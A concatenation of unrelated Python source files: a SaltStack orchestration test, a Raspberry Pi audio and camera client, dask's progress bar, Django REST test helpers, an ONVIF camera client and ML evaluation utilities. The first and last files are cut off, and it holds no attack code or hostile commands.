def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.files.fopen(state_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date:
cmd.run
'''))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
'''))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
del listener
signal.alarm(0)
|
cognoclient.py
|
import cv2
import socket
import time
import pyaudio
from playsound import playsound
import wave
import uuid
from collections import deque
import os
import threading
import RPi.GPIO as GPIO
class AudioBuffer():
def __init__(self, dbpath, seconds=3):
"""
An audiobuffer that keeps the last few seconds of audio in memory
Parameters
----------
dbpath : String
The path to the audiobase.
seconds : float or int
The the amount of time to keep in memory
Returns
-------
NoneType
None
"""
self.dbpath = dbpath
self.CHUNK = 2048
self.FORMAT = pyaudio.paInt16
self.CHANNELS = 1
self.RATE = 44100
self.RECORD_SECONDS = seconds
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=self.FORMAT, channels=self.CHANNELS, rate=self.RATE, input=True, frames_per_buffer=self.CHUNK, input_device_index=1)
self.frames = deque()
try:
for i in range(0, int(self.RATE / self.CHUNK * self.RECORD_SECONDS)):
data = self.stream.read(self.CHUNK)
self.frames.append(data)
except:
pass
self.AudioThread = threading.Thread(target=self._read_loop, args=())
self.AudioThread.start()
def read(self):
"""
Reads another moment of the audio and adds it to the buffer whiled popleft() in the last second
Returns
-------
NoneType
None
"""
data = self.stream.read(self.CHUNK)
self.frames.append(data)
self.frames.popleft()
def _read_loop(self):
"""
Loops the read function
Returns
-------
NoneType
None
"""
while True:
self.read()
def get(self):
"""
Gets the last few seconds of the audiobuffer
Returns
-------
deque
A deque with raw audio data from PyAudio
"""
return self.frames
def close(self):
"""
Closes the pyaudio stream and stops recording
Returns
-------
NoneType
None
"""
self.stream.stop_stream()
self.stream.close()
self.p.terminate()
def save(self, name):
"""
Saves the audiostream to a file under the audiobase with a folder called "name"
Parameters
----------
name : str
Name to save the folder under in the audiobase
Returns
-------
NoneType
None
"""
try:
os.mkdir(os.path.join(self.dbpath, name))
except:
pass
wf = wave.open(os.path.join(self.dbpath, name, str(uuid.uuid4()) + ".wav"), 'wb')
wf.setnchannels(self.CHANNELS)
wf.setsampwidth(self.p.get_sample_size(self.FORMAT))
wf.setframerate(self.RATE)
wf.writeframes(b''.join(list(self.frames)))
wf.close()
# Global variable specifically for server connection
client_socket = None
def connect_server():
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('192.168.1.5', 8485))
# Global variables used specifically for GPIO callback
GPIO_action = None
last_press = 0
def GPIO_callback(channel):
global GPIO_action, last_press
press_time = round(time.time() * 1000)
press_diff = press_time - last_press
last_press = press_time
GPIO_action = 'double' if press_diff < 250 else 'single'
if __name__ == '__main__':
# Connect to server using sockets.io
connect_server()
camera = cv2.VideoCapture(0)
# Initialize audio buffer
audio_buffer = AudioBuffer('Data/audiobase')
# Set GPIO mode to BCM (not sure what it means but it works)
GPIO.setmode(GPIO.BCM)
# Setup pin 4 to accept GPIO input from touch sensor
GPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# Add event listener for touch sensor GPIO pin
GPIO.add_event_detect(4, GPIO.BOTH, GPIO_callback)
# Throw main thread into action loop
while True:
ms_since_last_press = round(time.time() * 1000) - last_press
if GPIO_action and ms_since_last_press > 200:
print(GPIO_action + ' press.')
if GPIO_action == 'double':
# Create new UUID and save audio file under that name
id = str(uuid.uuid4())
audio_buffer.save(id)
# Read single camera frame
_, img = camera.read()
img = cv2.imencode('.jpg', img).tobytes()
# Send the image along with its length
client_socket.send(len(img).to_bytes(4, 'little'))
client_socket.send(img)
# Send the UUID along with its length
client_socket.send(len(id).to_bytes(4, 'little'))
client_socket.send(id)
elif GPIO_action == 'single':
# Capture a frame and encode it in JPEG
_, img = camera.read()
img = cv2.imencode('.jpg', img).tobytes()
# Send the image across the socket with its size
client_socket.send(len(img).to_bytes(4, 'little'))
client_socket.send(img)
# Read UUID from server
id_len = int.from_bytes(client_socket.read(4), 'little')
id = str(client_socket.read(id_len))
# Play sound from saved wav file
playsound(id + '.wav')
GPIO_action = None
|
progress.py
|
import sys
import threading
import time
from timeit import default_timer
from ..callbacks import Callback
from ..utils import ignoring
def format_time(t):
"""Format seconds into a human readable form.
>>> format_time(10.4)
'10.4s'
>>> format_time(1000.4)
'16min 40.4s'
"""
m, s = divmod(t, 60)
h, m = divmod(m, 60)
if h:
return "{0:2.0f}hr {1:2.0f}min {2:4.1f}s".format(h, m, s)
elif m:
return "{0:2.0f}min {1:4.1f}s".format(m, s)
else:
return "{0:4.1f}s".format(s)
class ProgressBar(Callback):
"""A progress bar for dask.
Parameters
----------
minimum : int, optional
Minimum time threshold in seconds before displaying a progress bar.
Default is 0 (always display)
width : int, optional
Width of the bar
dt : float, optional
Update resolution in seconds, default is 0.1 seconds
Examples
--------
Below we create a progress bar with a minimum threshold of 1 second before
displaying. For cheap computations nothing is shown:
>>> with ProgressBar(minimum=1.0): # doctest: +SKIP
... out = some_fast_computation.compute()
But for expensive computations a full progress bar is displayed:
>>> with ProgressBar(minimum=1.0): # doctest: +SKIP
... out = some_slow_computation.compute()
[########################################] | 100% Completed | 10.4 s
The duration of the last computation is available as an attribute
>>> pbar = ProgressBar() # doctest: +SKIP
>>> with pbar: # doctest: +SKIP
... out = some_computation.compute()
[########################################] | 100% Completed | 10.4 s
>>> pbar.last_duration # doctest: +SKIP
10.4
You can also register a progress bar so that it displays for all
computations:
>>> pbar = ProgressBar() # doctest: +SKIP
>>> pbar.register() # doctest: +SKIP
>>> some_slow_computation.compute() # doctest: +SKIP
[########################################] | 100% Completed | 10.4 s
"""
def __init__(self, minimum=0, width=40, dt=0.1, out=None):
if out is None:
out = sys.stdout
self._minimum = minimum
self._width = width
self._dt = dt
self._file = out
self.last_duration = 0
def _start(self, dsk):
self._state = None
self._start_time = default_timer()
# Start background thread
self._running = True
self._timer = threading.Thread(target=self._timer_func)
self._timer.daemon = True
self._timer.start()
def _pretask(self, key, dsk, state):
self._state = state
self._file.flush()
def _finish(self, dsk, state, errored):
self._running = False
self._timer.join()
elapsed = default_timer() - self._start_time
self.last_duration = elapsed
if elapsed < self._minimum:
return
if not errored:
self._draw_bar(1, elapsed)
else:
self._update_bar(elapsed)
self._file.write("\n")
self._file.flush()
def _timer_func(self):
"""Background thread for updating the progress bar"""
while self._running:
elapsed = default_timer() - self._start_time
if elapsed > self._minimum:
self._update_bar(elapsed)
time.sleep(self._dt)
def _update_bar(self, elapsed):
s = self._state
if not s:
self._draw_bar(0, elapsed)
return
ndone = len(s["finished"])
ntasks = sum(len(s[k]) for k in ["ready", "waiting", "running"]) + ndone
if ndone < ntasks:
self._draw_bar(ndone / ntasks if ntasks else 0, elapsed)
def _draw_bar(self, frac, elapsed):
bar = "#" * int(self._width * frac)
percent = int(100 * frac)
elapsed = format_time(elapsed)
msg = "\r[{0:<{1}}] | {2}% Completed | {3}".format(
bar, self._width, percent, elapsed
)
with ignoring(ValueError):
self._file.write(msg)
self._file.flush()
|
test_helpers.py
|
import json
import threading
import time
from django.db import connection
from django.test import Client
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from bullet_point.models import BulletPoint
from discussion.models import Thread
from hub.models import Hub
from paper.models import Paper, Vote
from user.models import Author, University, User
class TestData:
first_name = 'Regulus'
last_name = 'Black'
author_first_name = 'R. A.'
author_last_name = 'Black'
invalid_email = 'testuser@gmail'
invalid_password = 'pass'
valid_email = 'testuser@gmail.com'
valid_password = 'ReHub940'
university_name = 'Hogwarts'
university_country = 'England'
university_state = 'London'
university_city = 'London'
paper_title = ('Messrs Moony, Wormtail, Padfoot, and Prongs Purveyors of'
' Aids to Magical Mischief-Makers are proud to present THE'
' MARAUDER\'S MAP'
)
paper_titles = [
'Engendering Extroverted Murder: Hamlet Revenge and/in the Oppressed',
'Freedom Of Speech',
'How Films Relate To Criminology',
'Constructing Reliable Vision',
'Self-Organization of Associative Database and Its Applications',
'Family Discovery',
'Learning the Structure of Similarity',
'Forward-backward retraining of recurrent neural networks',
'Stable Dynamic Parameter Adaption',
'Improving Elevator Performance Using Reinforcement Learning',
'Softassign versus Softmax: Benchmarks in Combinatorial Optimization',
]
paper_publish_date = '1990-10-01'
# REFACTOR: Instead of having to inherit this class, test cases should import
# the needed functions from a test_helper module that is defined in each app.
class TestHelper:
test_data = TestData()
def create_user(
self,
first_name=test_data.first_name,
last_name=test_data.last_name,
email=test_data.valid_email,
password=test_data.valid_password
):
return User.objects.create(
first_name=first_name,
last_name=last_name,
email=email,
password=password
)
def create_random_authenticated_user(self, unique_value):
user = self.create_random_default_user(unique_value)
Token.objects.create(user=user)
return user
def create_random_default_user(self, unique_value):
first_name = self.test_data.first_name + str(unique_value)
last_name = self.test_data.last_name + str(unique_value)
email = str(unique_value) + self.test_data.valid_email
user = self.create_user(
first_name=first_name,
last_name=last_name,
email=email
)
return user
def create_author(
self,
user,
university,
first_name=test_data.author_first_name,
last_name=test_data.author_last_name
):
return Author.objects.create(
user=user,
first_name=first_name,
last_name=last_name,
university=university
)
def create_author_without_user(
self,
university,
first_name=test_data.author_first_name,
last_name=test_data.author_last_name
):
return Author.objects.create(
first_name=first_name,
last_name=last_name,
university=university
)
def create_university(
self,
name=test_data.university_name,
country=test_data.university_country,
state=test_data.university_state,
city=test_data.university_city
):
return University.objects.create(
name=name,
country=country,
state=state,
city=city
)
def create_paper_without_authors(
self,
title=test_data.paper_title
):
return Paper.objects.create(
title=title,
paper_publish_date=self.test_data.paper_publish_date
)
def create_hub(
self,
name
):
return Hub.objects.create(
name=name
)
def create_upvote(
self,
user,
paper
):
return Vote.objects.create(
paper=paper,
created_by=user,
vote_type=Vote.UPVOTE
)
def create_downvote(
self,
user,
paper
):
return Vote.objects.create(
paper=paper,
created_by=user,
vote_type=Vote.DOWNVOTE
)
def create_thread(
self,
user,
paper,
text='thread'
):
return Thread.objects.create(
created_by=user,
paper=paper,
text={'text': text},
plain_text=text
)
def create_bulletpoint(
self,
user,
paper,
text='bulletpoint'
):
return BulletPoint.objects.create(
created_by=user,
paper=paper,
plain_text=text
)
class IntegrationTestHelper(TestData):
client = Client()
def get_default_authenticated_client(self):
response = self.signup_default_user()
response_content = self.bytes_to_json(response.content)
token = response_content.get('key')
client = self._create_authenticated_client(token)
return client
def signup_default_user(self):
url = '/auth/signup/'
body = {
"username": self.valid_email,
"email": self.valid_email,
"password1": self.valid_password,
"password2": self.valid_password
}
return self.get_post_response(url, body)
def bytes_to_json(self, data_bytes):
data_string = data_bytes.decode('utf-8')
json_dict = json.loads(data_string)
return json_dict
def get_get_response(
self,
path,
query_data=None,
follow_redirects=True,
client=client
):
"""
Returns the response of a `GET` request made by `client`.
query_data {'param1': ['value1', 'value2'], 'param2': ['value3']}
"""
return client.get(
path,
data=query_data,
follow=follow_redirects,
content_type='application/json'
)
def get_post_response(
self,
path,
data,
client=client,
content_type='application/json',
follow_redirects=True
):
return client.post(
path,
data=json.dumps(data),
follow=follow_redirects,
content_type=content_type
)
def get_authenticated_get_response(
self,
user,
url,
content_type
):
csrf = False
if content_type == 'application/json':
content_format = 'json'
elif content_type == 'multipart/form-data':
content_format = 'multipart'
csrf = True
client = APIClient(enforce_csrf_checks=csrf)
client.force_authenticate(user=user, token=user.auth_token)
response = client.get(url, format=content_format)
return response
def _create_authenticated_client(self, auth_token):
return Client(HTTP_AUTHORIZATION=f'Token {auth_token}')
def bytes_to_json(data_bytes):
"""Returns `json_dict` representation of `data_bytes`."""
data_string = data_bytes.decode('utf-8')
json_dict = json.loads(data_string)
return json_dict
def get_authenticated_get_response(
user,
url,
content_type='application/json'
):
'''
Sends a get request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.get(url, format=content_format)
return response
def get_get_response(
path,
query_data=None,
follow_redirects=True,
csrf=False,
http_origin=None
):
"""
Returns the response of a `GET` request made by `client`.
query_data {'param1': ['value1', 'value2'], 'param2': ['value3']}
"""
client = APIClient(enforce_csrf_checks=csrf, HTTP_ORIGIN=http_origin)
return client.get(
path,
data=query_data,
follow=follow_redirects,
content_type='application/json'
)
def get_authenticated_post_response(
user,
url,
data,
content_type='application/json',
follow=False,
headers=None
):
'''
Sends a post request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type,
http_origin=headers and headers.get('HTTP_ORIGIN', None)
)
response = client.post(url, data, format=content_format, follow=follow)
return response
def get_authenticated_patch_response(
user,
url,
data,
content_type
):
'''
Sends a patch request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.patch(url, data, format=content_format)
return response
def get_authenticated_put_response(
user,
url,
data,
content_type
):
'''
Sends a put request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.put(url, data, format=content_format)
return response
def get_authenticated_delete_response(
user,
url,
data,
content_type
):
'''
Sends a delete request authenticated with `user` and returns the response.
'''
client, content_format = _get_authenticated_client_config(
user,
url,
content_type
)
response = client.delete(url, data, format=content_format)
return response
def _get_authenticated_client_config(
user,
url,
content_type,
http_origin=None
):
csrf = False
if content_type == 'multipart/form-data':
content_format = 'multipart'
csrf = True
elif content_type == 'plain/text':
content_format = 'txt'
else:
content_format = 'json'
client = APIClient(enforce_csrf_checks=csrf, HTTP_ORIGIN=http_origin)
client.force_authenticate(user=user, token=user.auth_token)
return client, content_format
def get_user_from_response(response):
return response.wsgi_request.user
class DatabaseThread(threading.Thread):
def run(self):
super().run()
connection.close()
# Copied from
# https://www.caktusgroup.com/blog/2009/05/26/testing-django-views-for-concurrency-issues/
def test_concurrently(runs, delay=None):
"""
Add this decorator to small pieces of code that you want to test
concurrently to make sure they don't raise exceptions when run at the
same time. E.g., some Django views that do a SELECT and then a subsequent
INSERT might fail when the INSERT assumes that the data has not changed
since the SELECT.
"""
def test_concurrently_decorator(test_func):
def wrapper(*args, **kwargs):
exceptions = []
def call_test_func():
try:
test_func(*args, **kwargs)
except Exception as e:
exceptions.append(e)
raise
threads = []
for i in range(runs):
threads.append(DatabaseThread(target=call_test_func))
for t in threads:
if delay is not None:
time.sleep(delay)
t.start()
for t in threads:
if delay is not None:
time.sleep(delay)
t.join()
if exceptions:
raise Exception(
'test_concurrently intercepted %s exceptions: %s'
% (len(exceptions), exceptions)
)
return wrapper
return test_concurrently_decorator
|
client.py
|
__version__ = '0.0.1'
import os.path
import re
import urlparse
import urllib
from threading import Thread, RLock
import logging
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('suds.client').setLevel(logging.CRITICAL)
import suds.sudsobject
from suds.client import Client
from suds.wsse import Security, UsernameToken
from suds.cache import ObjectCache, NoCache
from suds_passworddigest.token import UsernameDigestToken
from suds.bindings import binding
binding.envns = ('SOAP-ENV', 'http://www.w3.org/2003/05/soap-envelope')
from onvif.exceptions import ONVIFError
from definition import SERVICES, NSMAP
from suds.sax.date import UTC
import datetime as dt
# Ensure methods to raise an ONVIFError Exception
# when some thing was wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameDigestToken):
'''
UsernameDigestToken class, with a time offset parameter that can be adjusted;
This allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environements.
'''
def __init__(self, user, passw, dt_diff=None) :
# Old Style class ... sigh ...
UsernameDigestToken.__init__(self, user, passw)
self.dt_diff = dt_diff
def setcreated(self, *args, **kwargs):
dt_adjusted = None
if self.dt_diff :
dt_adjusted = (self.dt_diff + dt.datetime.utcnow())
UsernameToken.setcreated(self, dt=dt_adjusted, *args, **kwargs)
self.created = str(UTC(self.created))
class ONVIFService(object):
'''
Python Implemention for ONVIF Service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print ret.FromDHCP
>>> print ret.Name
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print ret.DaylightSavings
>>> print ret.TimeZone
>>> dict_ret = device_service.to_dict(ret)
>>> print dict_ret['TimeZone']
There are two ways to pass parameter to services methods
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
'''
@safe_func
def __init__(self, xaddr, user, passwd, url,
cache_location='/tmp/suds', cache_duration=None,
encrypt=True, daemon=False, ws_client=None, no_cache=False,
portType=None, dt_diff = None, timeout=None):
if not os.path.isfile(url):
raise ONVIFError('%s doesn`t exist!' % url)
if no_cache:
cache = NoCache()
else:
# Create cache object
# NOTE: if cache_location is specified,
# onvif must has the permission to access it.
cache = ObjectCache(location=cache_location)
# cache_duration: cache will expire in `cache_duration` days
if cache_duration is not None:
cache.setduration(days=cache_duration)
# Convert pathname to url
self.url = urlparse.urljoin('file:', urllib.pathname2url(url))
self.xaddr = xaddr
soap_kwargs = {}
if timeout:
soap_kwargs['timeout'] = timeout
# Create soap client
if not ws_client:
self.ws_client = Client(url=self.url,
location=self.xaddr,
cache=cache,
port=portType,
headers={'Content-Type': 'application/soap+xml'},
**soap_kwargs)
else:
self.ws_client = ws_client
self.ws_client.set_options(location=self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicate wether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
if self.user is not None and self.passwd is not None:
self.set_wsse()
# Method to create type instance of service method defined in WSDL
self.create_type = self.ws_client.factory.create
@safe_func
def set_wsse(self, user=None, passwd=None):
''' Basic ws-security auth '''
if user:
self.user = user
if passwd:
self.passwd = passwd
security = Security()
if self.encrypt:
token = UsernameDigestTokenDtDiff(self.user, self.passwd, dt_diff=self.dt_diff)
else:
token = UsernameToken(self.user, self.passwd)
token.setnonce()
token.setcreated()
security.tokens.append(token)
self.ws_client.set_options(wsse=security)
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(sudsobject):
# Convert a WSDL Type instance into a dictionary
if sudsobject is None:
return { }
elif isinstance(sudsobject, list):
ret = [ ]
for item in sudsobject:
ret.append(Client.dict(item))
return ret
return Client.dict(sudsobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
elif isinstance(params, suds.sudsobject.Object):
params = ONVIFService.to_dict(params)
ret = func(**params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
'''
Call the real onvif Service operations,
See the offical wsdl definition for the
APIs detail(API name, request parameters,
response parameters, parameter types, etc...)
'''
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client.service, name))
class ONVIFCamera(object):
'''
Python Implemention ONVIF compliant device
This class integrates onvif services
adjust_time parameter allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environements.
Also, this cannot be used on AXIS camera, as every request is authenticated, contrary to ONVIF standard
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> mycam.ptz.GetConfiguration()
# Another way:
>>> ptz_service.GetConfiguration()
'''
def __init__(self, host, port ,user, passwd, wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)), "wsdl"),
cache_location=None, cache_duration=None,
encrypt=True, daemon=False, no_cache=False,
adjust_time=False, timeout=None, force_provided_host=False):
self.services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None }
self.use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True }
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.cache_location = cache_location
self.cache_duration = cache_duration
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
self.timeout = timeout
self.force_provided_host = force_provided_host
# Active service client container
self.services = { }
self.services_lock = RLock()
# Set xaddrs
self.update_xaddrs()
self.to_dict = ONVIFService.to_dict
def update_xaddrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time :
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day, cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt.set_wsse()
# Get XAddr of services on the device
self.xaddrs = { }
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name, capability in capabilities:
try:
if name.lower() in SERVICES:
ns = SERVICES[name.lower()]['ns']
service_xaddr = capability['XAddr']
if self.force_provided_host:
# regex to capture everything from http[s]:// to the following /
host_regex = re.compile(r"^(https?://)(.*?)/", re.IGNORECASE)
provided_host_and_port = "{}:{}".format(self.host, self.port)
replacement_xaddr = re.sub(
host_regex,
r"\g<1>{}/".format(provided_host_and_port),
service_xaddr
)
service_xaddr = replacement_xaddr
self.xaddrs[ns] = service_xaddr
except Exception:
logger.exception('Unexcept service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = self.event.CreatePullPointSubscription().SubscriptionReference.Address
except:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in self.services.keys():
xaddr = getattr(self.capabilities, sname.capitalize).XAddr
self.services[sname].ws_client.set_options(location=xaddr)
def update_auth(self, user=None, passwd=None):
changed = False
if user and user != self.user:
changed = True
self.user = user
if passwd and passwd != self.passwd:
changed = True
self.passwd = passwd
if not changed:
return
with self.services_lock:
for service in self.services.keys():
self.services[service].set_wsse(user, passwd)
def get_service(self, name, create=True):
service = None
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name):
'''Returns xaddr and wsdl of specified service'''
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
xaddr = 'http://%s:%s/onvif/device_service' % (self.host, self.port)
return xaddr, wsdlpath
# Get other XAddr
xaddr = self.xaddrs.get(ns)
if not xaddr:
raise ONVIFError('Device doesn`t support service: %s' % name)
return xaddr, wsdlpath
def create_onvif_service(self, name, from_template=True, portType=None):
'''Create ONVIF service client'''
name = name.lower()
xaddr, wsdl_file = self.get_definition(name)
with self.services_lock:
svt = self.services_template.get(name)
# Has a template, clone from it. Faster.
if svt and from_template and self.use_services_template.get(name):
service = ONVIFService.clone(svt, xaddr, self.user,
self.passwd, wsdl_file,
self.cache_location,
self.cache_duration,
self.encrypt,
self.daemon,
no_cache=self.no_cache,
portType=portType,
dt_diff=self.dt_diff,
timeout=self.timeout)
# No template, create new service from wsdl document.
# A little time-comsuming
else:
service = ONVIFService(xaddr, self.user, self.passwd,
wsdl_file, self.cache_location,
self.cache_duration, self.encrypt,
self.daemon, no_cache=self.no_cache,
portType=portType, dt_diff=self.dt_diff,
timeout=self.timeout)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, from_template=True):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', from_template)
def create_media_service(self, from_template=True):
return self.create_onvif_service('media', from_template)
def create_ptz_service(self, from_template=True):
return self.create_onvif_service('ptz', from_template)
def create_imaging_service(self, from_template=True):
return self.create_onvif_service('imaging', from_template)
def create_deviceio_service(self, from_template=True):
return self.create_onvif_service('deviceio', from_template)
def create_events_service(self, from_template=True):
return self.create_onvif_service('events', from_template)
def create_analytics_service(self, from_template=True):
return self.create_onvif_service('analytics', from_template)
def create_recording_service(self, from_template=True):
return self.create_onvif_service('recording', from_template)
def create_search_service(self, from_template=True):
return self.create_onvif_service('search', from_template)
def create_replay_service(self, from_template=True):
return self.create_onvif_service('replay', from_template)
def create_pullpoint_service(self, from_template=True):
return self.create_onvif_service('pullpoint', from_template, portType='PullPointSubscription')
def create_receiver_service(self, from_template=True):
return self.create_onvif_service('receiver', from_template)
|
base.py
|
import csv
import os
import time
import random as rand
from shared import Instance
from java.lang import Math
import Queue
import threading
__all__ = ['initialize_instances', 'error_on_data_set',
'train', 'make_dirs', 'f1_score', 'write_to_file']
def printer():
while True:
item = printqueue.get()
if item is None:
break
if len(item) == 2:
path = item[0]
txt = item[1]
with open(path, 'a+') as f:
f.write(txt)
printqueue.task_done()
printqueue = Queue.Queue()
t = threading.Thread(target=printer)
t.start()
def write_to_file(f, txt):
printqueue.put((f, txt))
def make_dirs(OUTPUT_DIRECTORY):
if not os.path.exists(OUTPUT_DIRECTORY):
os.makedirs(OUTPUT_DIRECTORY)
if not os.path.exists(OUTPUT_DIRECTORY + '/images'):
os.makedirs(OUTPUT_DIRECTORY + '/images')
subdirs = ['NN_OUTPUT', 'CONTPEAKS', 'FLIPFLOP', 'TSP']
for subdir in subdirs:
if not os.path.exists('{}/{}'.format(OUTPUT_DIRECTORY, subdir)):
os.makedirs('{}/{}'.format(OUTPUT_DIRECTORY, subdir))
if not os.path.exists('{}/images/{}'.format(OUTPUT_DIRECTORY, subdir)):
os.makedirs('{}/images/{}'.format(OUTPUT_DIRECTORY, subdir))
def initialize_instances(infile):
"""Read the given CSV data into a list of instances."""
instances = []
# Read in the CSV file
with open(infile, "r") as dat:
reader = csv.reader(dat)
for row in reader:
instance = Instance([float(value) for value in row[:-1]])
# TODO: Set to <= 0 to handle 0/1 labels and not just -1/1?
instance.setLabel(Instance(0 if float(row[-1]) < 0 else 1))
instances.append(instance)
return instances
# Adapted from:
# https://codereview.stackexchange.com/questions/36096/implementing-f1-score
# https://www.kaggle.com/hongweizhang/how-to-calculate-f1-score
# https://blog.exsilio.com/all/accuracy-precision-recall-f1-score-interpretation-of-performance-measures/
def f1_score(labels, predicted):
def get_count(x): return sum([1 for i in x if i is True])
tp = get_count([predicted[i] == x and x ==
1.0 for i, x in enumerate(labels)])
tn = get_count([predicted[i] == x and x ==
0.0 for i, x in enumerate(labels)])
fp = get_count([predicted[i] == 1.0 and x ==
0.0 for i, x in enumerate(labels)])
fn = get_count([predicted[i] == 0.0 and x ==
1.0 for i, x in enumerate(labels)])
if tp == 0:
return 0, 0, 0
precision = float(tp) / (tp + fp)
recall = float(tp) / (tp + fn)
try:
f1 = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
return precision, recall, 0.0
return precision, recall, f1
def error_on_data_set(network, ds, measure, ugh=False):
N = len(ds)
error = 0.
correct = 0
incorrect = 0
actuals = []
predicteds = []
for instance in ds:
network.setInputValues(instance.getData())
network.run()
actual = instance.getLabel().getContinuous()
predicted = network.getOutputValues().get(0)
predicted = max(min(predicted, 1), 0)
if ugh:
print("label: {}".format(instance.getLabel()))
print("actual: {}, predicted: {}".format(actual, predicted))
predicteds.append(round(predicted))
actuals.append(max(min(actual, 1), 0))
if abs(predicted - actual) < 0.5:
correct += 1
if ugh:
print("CORRECT")
else:
incorrect += 1
if ugh:
print("INCORRECT")
output = instance.getLabel()
output_values = network.getOutputValues()
example = Instance(output_values, Instance(output_values.get(0)))
error += measure.value(output, example)
if ugh:
print("error: {}".format(measure.value(output, example)))
MSE = error / float(N)
acc = correct / float(correct + incorrect)
